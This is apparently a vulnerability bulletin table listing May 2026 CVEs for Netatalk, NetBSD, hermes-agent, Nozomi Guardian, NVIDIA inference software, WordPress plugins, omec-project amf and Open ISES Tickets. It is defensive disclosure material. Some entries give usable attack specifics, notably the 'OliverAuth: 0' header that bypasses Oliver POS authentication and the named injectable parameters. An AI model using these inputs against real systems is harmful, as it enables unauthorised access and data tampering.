| Netatalk--Netatalk | An LDAP injection vulnerability in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to manipulate LDAP queries and obtain limited information or modify LDAP entries via crafted filter input. | 2026-05-21 | 4.2 | CVE-2026-44063 | Netatalk Security Advisory CVE-2026-44063 |
| Netatalk--Netatalk | Authentication modules in Netatalk 1.5.0 through 4.4.2 fail to check the return value of seteuid(), which may allow a remote authenticated attacker to retain elevated privileges under error conditions. | 2026-05-21 | 4 | CVE-2026-44073 | Netatalk Security Advisory CVE-2026-44073 |
| NetBSD--src | NetBSD prior to commit ec8451e contains a signed integer overflow vulnerability in the cryptodev_op() function in sys/opencrypto/cryptodev.c where the local variable iov_len is declared as a signed int but assigned from an unsigned cop->dst_len value, causing undefined behavior when cop->dst_len exceeds INT_MAX. A local attacker with access to /dev/crypto and a compression session type can exploit this vulnerability by providing a dst_len value exceeding INT_MAX to trigger a kernel panic through NULL pointer dereference when CONFIG_SVS is disabled and corrupted UIO pointer arithmetic. | 2026-05-18 | 5.5 | CVE-2026-32849 | https://nasm.re/posts/uaf_netbsd_crypto/ https://github.com/NetBSD/src/commit/ec8451efc1565516aba9e7047e1a1a1ce7953a2f https://www.vulncheck.com/advisories/netbsd-signed-integer-overflow-in-cryptodev-op-via-cryptodev-c |
| NetBSD--src | NetBSD prior to commit ec8451e contains a race condition vulnerability in cryptodev_op() within the opencrypto subsystem that allows local attackers to trigger a double-free condition by concurrently issuing CIOCCRYPT operations on the same session identifier on SMP systems. Attackers can exploit mutable per-operation state embedded in the csession struct to corrupt kernel heap memory. | 2026-05-18 | 4.7 | CVE-2026-32848 | https://nasm.re/posts/uaf_netbsd_crypto/ https://github.com/NetBSD/src/commit/ec8451efc1565516aba9e7047e1a1a1ce7953a2f https://www.vulncheck.com/advisories/netbsd-cryptodev-race-condition-double-free-via-cryptodev-op |
| nimiq--core-rs-albatross | nimiq-blockchain provides persistent block storage for Nimiq's Rust implementation. In versions 1.3.0 and prior, network-libp2p discovery accepts signed PeerContact updates from untrusted peers and stores them in a peer contact book, eventually leading to address book crash. A PeerContact can legally contain an empty addresses list (no intrinsic validation enforces non-empty). Later, PeerContactBook::known_peers builds an address book by taking addresses.first().expect("every peer should have at least one address"). If the attacker has inserted a signed peer contact with addresses=[], any call to get_address_book (RPC/web client) can panic and crash the node/RPC task depending on panic settings. This issue has been fixed in version 1.4.0. | 2026-05-20 | 4.3 | CVE-2026-40094 | https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-c45m-6x25-3cjq https://github.com/nimiq/core-rs-albatross/pull/3715 https://github.com/nimiq/core-rs-albatross/releases/tag/v1.4.0 |
| NousResearch--hermes-agent | A security flaw has been discovered in NousResearch hermes-agent up to 2026.4.16. This vulnerability affects the function _is_blocked_device of the file tools/file_tools.py of the component read_file Tool. Performing a manipulation results in path traversal. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.5 | CVE-2026-9351 | VDB-365314; NousResearch hermes-agent read_file Tool file_tools.py _is_blocked_device path traversal VDB-365314; CTI Indicators (IOB, IOC, TTP, IOA) Submit #812214; NousResearch hermes-agent 2026.4.16 Path Traversal (CWE-22) https://gist.github.com/YLChen-007/1d1aeff404cb88e06ec2fb3377f49fef |
| NousResearch--hermes-agent | A vulnerability was detected in NousResearch hermes-agent up to 2026.4.16. The affected element is an unknown function of the component Slack Agent/Mattermost Agent. The manipulation of the argument format_message results in escaping of output. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.5 | CVE-2026-9354 | VDB-365317; NousResearch hermes-agent Slack Agent/Mattermost Agent escape output VDB-365317; CTI Indicators (IOB, IOC, IOA) Submit #812226; NousResearch hermes-agent 2026.4.16 Improper Encoding or Escaping of Output (CWE-116) https://gist.github.com/YLChen-007/e90fb38ac03284176bae49898a3a46a4 |
| NousResearch--hermes-agent | A weakness has been identified in NousResearch hermes-agent up to 2026.4.23. This issue affects the function _make_run_env of the file tools/environments/local.py of the component Messaging Gateway Handler. Executing a manipulation can lead to information disclosure. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 5.3 | CVE-2026-9352 | VDB-365315; NousResearch hermes-agent Messaging Gateway local.py _make_run_env information disclosure VDB-365315; CTI Indicators (IOB, IOC, TTP, IOA) Submit #812215; NousResearch hermes-agent 2026.4.23 Exposure of Sensitive Information (CWE-200) https://gist.github.com/YLChen-007/760b3940f708990e535214529c0c7a27 |
| NousResearch--hermes-agent | A security flaw has been discovered in NousResearch hermes-agent 2026.4.23. Affected is the function _discover_dashboard_plugins of the file hermes_cli/web_server.py of the component CLI web-dashboard Interface. Performing a manipulation of the argument HERMES_ENABLE_PROJECT_PLUGINS results in incorrect comparison. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 5.3 | CVE-2026-9369 | VDB-365332; NousResearch hermes-agent CLI web-dashboard web_server.py _discover_dashboard_plugins comparison VDB-365332; CTI Indicators (IOB, IOC, IOA) Submit #812230; NousResearch hermes-agent 2026.4.23 Incorrect Comparison (CWE-697) https://gist.github.com/YLChen-007/062b77ceac6aa9844842a616f5d2ef30 |
| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Smart Polling functionality due to improper validation of an input parameter. An authenticated user with limited privileges can push malicious remote strategies containing HTML tags through the sync. When a victim views the affected remote strategy in the Smart Polling functionality, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 6.5 | CVE-2025-40904 | https://security.nozominetworks.com/NN-2026:7-01 |
| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Credentials Manager functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can define a malicious identity containing HTML tags. When a victim attempts to delete the affected identity, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 5.9 | CVE-2025-40901 | https://security.nozominetworks.com/NN-2026:4-01 |
| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Users functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can create a malicious user whose username contains HTML tags. When a victim attempts to delete a group containing the affected user, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 5.9 | CVE-2025-40902 | https://security.nozominetworks.com/NN-2026:5-01 |
| Nozomi Networks--Guardian | A Stored HTML Injection vulnerability was discovered in the Schedule Restore Archive functionality due to improper validation of an input parameter. An authenticated user with administrative privileges can define a malicious restore schedule containing HTML tags. When a victim views the affected schedule, the injected HTML renders in their browser, enabling phishing and possibly open redirect attacks. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 5.9 | CVE-2025-40903 | https://security.nozominetworks.com/NN-2026:6-01 |
| Nozomi Networks--Guardian | An Angular template injection vulnerability was discovered in the Reports functionality due to improper validation of an input parameter. An authenticated user with report privileges can define a malicious report containing an Angular template payload, or a victim can be socially engineered to import a malicious report template. When the victim views or imports the report, the Angular template executes in their browser context, allowing the attacker to modify application data, or disrupt application availability. Full XSS exploitation and direct information disclosure are prevented by the existing input validation and Content Security Policy configuration. | 2026-05-19 | 4.6 | CVE-2025-40900 | https://security.nozominetworks.com/NN-2026:3-01 |
| npitre--cramfs-tools | A vulnerability was detected in npitre cramfs-tools up to 2.2. Affected is the function change_file_status of the file cramfsck.c. Performing a manipulation results in symlink following. The attack requires a local approach. The exploit is now public and may be used. The patch is named b4a3a695c9873f824907bd15659f2a6ac7667b4f. It is recommended to apply a patch to fix this issue. | 2026-05-18 | 4.2 | CVE-2026-8784 | VDB-364408; npitre cramfs-tools cramfsck.c change_file_status symlink VDB-364408; CTI Indicators (IOB, IOC, IOA) Submit #811897; GNU cramfs-tools below v2.2 Symlink Following https://github.com/npitre/cramfs-tools/issues/13 https://github.com/npitre/cramfs-tools/issues/13#issuecomment-4306102583 https://github.com/npitre/cramfs-tools/commit/b4a3a695c9873f824907bd15659f2a6ac7667b4f https://github.com/npitre/cramfs-tools/ |
| NVIDIA--TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a deserialization vulnerability and unsafe serialized handle. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure. | 2026-05-20 | 6.3 | CVE-2026-24142 | https://nvd.nist.gov/vuln/detail/CVE-2026-24142 https://www.cve.org/CVERecord?id=CVE-2026-24142 https://nvidia.custhelp.com/app/answers/detail/a_id/5805 |
| NVIDIA--TensorRT-LLM | NVIDIA TRT-LLM for any platform contains a vulnerability where an attacker could cause an unchecked return value to a null pointer dereference. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 5.5 | CVE-2026-24160 | https://nvd.nist.gov/vuln/detail/CVE-2026-24160 https://www.cve.org/CVERecord?id=CVE-2026-24160 https://nvidia.custhelp.com/app/answers/detail/a_id/5805 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a path traversal issue. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 5.3 | CVE-2026-24208 | https://nvd.nist.gov/vuln/detail/CVE-2026-24208 https://www.cve.org/CVERecord?id=CVE-2026-24208 https://nvidia.custhelp.com/app/answers/detail/a_id/5828 |
| NVIDIA--Triton Inference Server | NVIDIA Triton Inference Server contains a vulnerability in the DALI backend, where an attacker could cause uncontrolled resource consumption. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-20 | 5.7 | CVE-2026-24215 | https://nvd.nist.gov/vuln/detail/CVE-2026-24215 https://www.cve.org/CVERecord?id=CVE-2026-24215 https://nvidia.custhelp.com/app/answers/detail/a_id/5828 |
| oliverpos--Oliver POS A WooCommerce Point of Sale (POS) | The Oliver POS - A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to Authorization Bypass Through User-Controlled Key in all versions up to and including 2.4.2.6. The plugin protects its entire /wp-json/pos-bridge/* REST API namespace through the oliver_pos_rest_authentication() permission callback, which uses a loose PHP comparison (==) to compare the attacker-supplied 'OliverAuth' header value against the 'oliver_pos_authorization_token' option. On fresh installations where the admin has not yet completed the connection flow, this option is unset (get_option returns false). Due to PHP's type juggling, the loose comparison '0' == false evaluates to true, allowing an unauthenticated attacker to bypass authentication by sending 'OliverAuth: 0'. This grants full access to all POS API endpoints, enabling attackers to read user data (including administrator details), update user profiles (including email addresses), and delete non-admin users. An admin account email reset can lead to site takeover. | 2026-05-20 | 6.5 | CVE-2026-6072 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ca6aa922-9c58-445c-b88a-3d1d1c95102c?source=cve https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge.php#L1679 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge.php#L1679 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge.php#L1677 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge.php#L1677 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L170 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L170 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L195 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L195 https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-user.php#L231 https://plugins.trac.wordpress.org/browser/oliver-pos/tags/2.4.2.6/includes/class-pos-bridge-user.php#L231 |
| olivesystem-- | The 診断ジェネレータ作成プラグイン (Diagnosis Generator) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'js' parameter in versions up to and including 1.4.16. This is due to missing authorization checks and insufficient input sanitization in the themeFunc() function. The function is hooked to 'admin_init' and processes theme update requests without verifying user capabilities, allowing any authenticated user (including subscribers) to save malicious JavaScript to theme files. Additionally, the save() function uses stripslashes() which removes WordPress's magic quotes protection. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in theme files that will execute whenever a user accesses a page containing the diagnosis form shortcode. | 2026-05-20 | 6.4 | CVE-2026-5293 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5293c0f-90b0-41df-a623-90297d998c41?source=cve https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/diagnosisAdminClass.php#L409 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/diagnosisAdminClass.php#L409 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L26 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L26 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/class/themeClass.php#L39 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/class/themeClass.php#L39 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/trunk/include_files/user-viewFormPage.php#L102 https://plugins.trac.wordpress.org/browser/os-diagnosis-generator/tags/1.4.16/include_files/user-viewFormPage.php#L102 |
| omec-project--amf | A vulnerability was detected in omec-project amf up to 2.1.1. Affected by this vulnerability is an unknown functionality of the component PathSwitchRequest Handler. The manipulation results in memory corruption. The attack may be launched remotely. The exploit is now public and may be used. It is advisable to implement a patch to correct this issue. | 2026-05-23 | 6.3 | CVE-2026-9298 | VDB-365245; omec-project amf PathSwitchRequest memory corruption VDB-365245; CTI Indicators (IOB, IOC) Submit #811684; Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/680 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project--amf | A flaw has been found in omec-project amf up to 2.1.1. Affected by this issue is the function PDUSessionResourceModifyIndication of the file /go/src/amf/ngap/handler.go. This manipulation causes memory corruption. Remote exploitation of the attack is possible. The exploit has been published and may be used. Applying a patch is the recommended action to fix this issue. | 2026-05-23 | 6.3 | CVE-2026-9299 | VDB-365246; omec-project amf handler.go PDUSessionResourceModifyIndication memory corruption VDB-365246; CTI Indicators (IOB, IOC, IOA) Submit #811829; Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/681 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project--amf | A vulnerability has been found in omec-project amf up to 2.1.1. This affects an unknown part of the component NGSetupRequest Handler. Such manipulation leads to memory corruption. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. It is best practice to apply a patch to resolve this issue. | 2026-05-23 | 6.3 | CVE-2026-9300 | VDB-365247; omec-project amf NGSetupRequest memory corruption VDB-365247; CTI Indicators (IOB, IOC) Submit #811841; Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/679 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project--amf | A vulnerability was found in omec-project amf up to 2.1.1. This vulnerability affects unknown code of the component NGReset Message Handler. Performing a manipulation results in memory corruption. The attack can be carried out remotely. The exploit has been made public and could be used. It is recommended to apply a patch to fix this issue. | 2026-05-23 | 6.3 | CVE-2026-9301 | VDB-365248; omec-project amf NGReset Message memory corruption VDB-365248; CTI Indicators (IOB, IOC) Submit #811842; Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/678 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/ |
| omec-project--amf | A vulnerability was determined in omec-project amf up to 2.1.3-dev. Impacted is the function NGSetupRequest of the file ngap/handler.go. Executing a manipulation of the argument InformationElement can lead to memory corruption. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 2.2.0 is recommended to address this issue. The affected component should be upgraded. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8779 | VDB-364403; omec-project amf handler.go NGSetupRequest memory corruption VDB-364403; CTI Indicators (IOB, IOC, IOA) Submit #811616; Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/671 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project--amf | A vulnerability was identified in omec-project amf up to 2.1.3-dev. The affected element is an unknown function of the file ngap/dispatcher.go of the component NGAP Message Handler. The manipulation leads to memory corruption. The attack may be initiated remotely. The exploit is publicly available and might be used. Upgrading to version 2.2.0 is sufficient to fix this issue. It is suggested to upgrade the affected component. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8780 | VDB-364404; omec-project amf NGAP Message dispatcher.go memory corruption VDB-364404; CTI Indicators (IOB, IOC, IOA) Submit #811617; Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/670 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project--amf | A security flaw has been discovered in omec-project amf up to 2.1.3-dev. The impacted element is the function RANConfiguration of the file ngap/handler.go. The manipulation results in null pointer dereference. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 2.2.0 is sufficient to resolve this issue. Upgrading the affected component is recommended. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8781 | VDB-364405; omec-project amf handler.go RANConfiguration null pointer dereference VDB-364405; CTI Indicators (IOB, IOC, IOA) Submit #811653; Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/673 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project--amf | A weakness has been identified in omec-project amf up to 2.1.3-dev. This affects an unknown function of the file ngap/handler.go of the component NGAP Message Handler. This manipulation causes null pointer dereference. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. Upgrading to version 2.2.0 mitigates this issue. It is recommended to upgrade the affected component. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8782 | VDB-364406; omec-project amf NGAP Message handler.go null pointer dereference VDB-364406; CTI Indicators (IOB, IOC, IOA) Submit #811654; Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/674 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| omec-project--amf | A security vulnerability has been detected in omec-project amf up to 2.1.3-dev. This impacts the function UERadioCapabilityCheckResponse of the file ngap/dispatcher.go. Such manipulation leads to null pointer dereference. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 2.2.0 will fix this issue. Upgrading the affected component is advised. The same pull request fixes multiple security issues. | 2026-05-18 | 4.3 | CVE-2026-8783 | VDB-364407; omec-project amf dispatcher.go UERadioCapabilityCheckResponse null pointer dereference VDB-364407; CTI Indicators (IOB, IOC, IOA) Submit #811655; Linux Foundation Projects SD-Core 2.1.1 Memory Corruption https://github.com/omec-project/amf/issues/675 https://github.com/omec-project/amf/pull/666 https://github.com/omec-project/amf/releases/tag/v2.2.0 https://github.com/omec-project/amf/ |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id POST parameter directly into an HTML form input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48213 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-php-ticket-id-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_nm.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id POST parameter directly into an HTML form input value attribute and an inline JavaScript string literal. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48214 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-nm-php-ticket-id-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in circle.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_id POST parameter directly into an HTML form input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48215 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-circle-php-frm-id-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in db_loader.php that allows authenticated attackers to inject arbitrary JavaScript by passing unsanitized values through multiple POST parameters (ticketshost, ticketsdb, ticketsuser, ticketspassword, ticketsprefix, db_schema) directly into HTML form input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48216 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-db-loader-php-multiple-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in delete_module.php that allows authenticated attackers to inject arbitrary JavaScript by passing unsanitized values through multiple POST parameters (module_choice, flag, confirmation) directly into rendered HTML content and form action attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48217 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-delete-module-php-multiple-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in icons/buttons/landb.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_name and frm_id POST parameters directly into rendered HTML content and inline JavaScript. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48218 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-icons-buttons-landb-php-frm-name-and-frm-id-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics202.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48219 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics202-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics205.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48220 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics205-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics205a.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48221 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics205a-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics213.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48222 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics213-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics213rr.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48223 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics213rr-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ics214.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_add_str POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48224 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ics214-php-frm-add-str-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in landb.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the _type POST parameter directly into an HTML form hidden input value attribute. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48225 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-landb-php-type-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in os_watch.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ref and mode_orig POST parameters directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48226 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-os-watch-php-ref-and-mode-orig-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id and ticket_id GET parameters directly into an HTML form action URL. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48227 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-php-id-and-ticket-id-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient_w.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id and ticket_id GET parameters directly into an HTML form action URL. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48228 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-w-php-id-and-ticket-id-parameters |
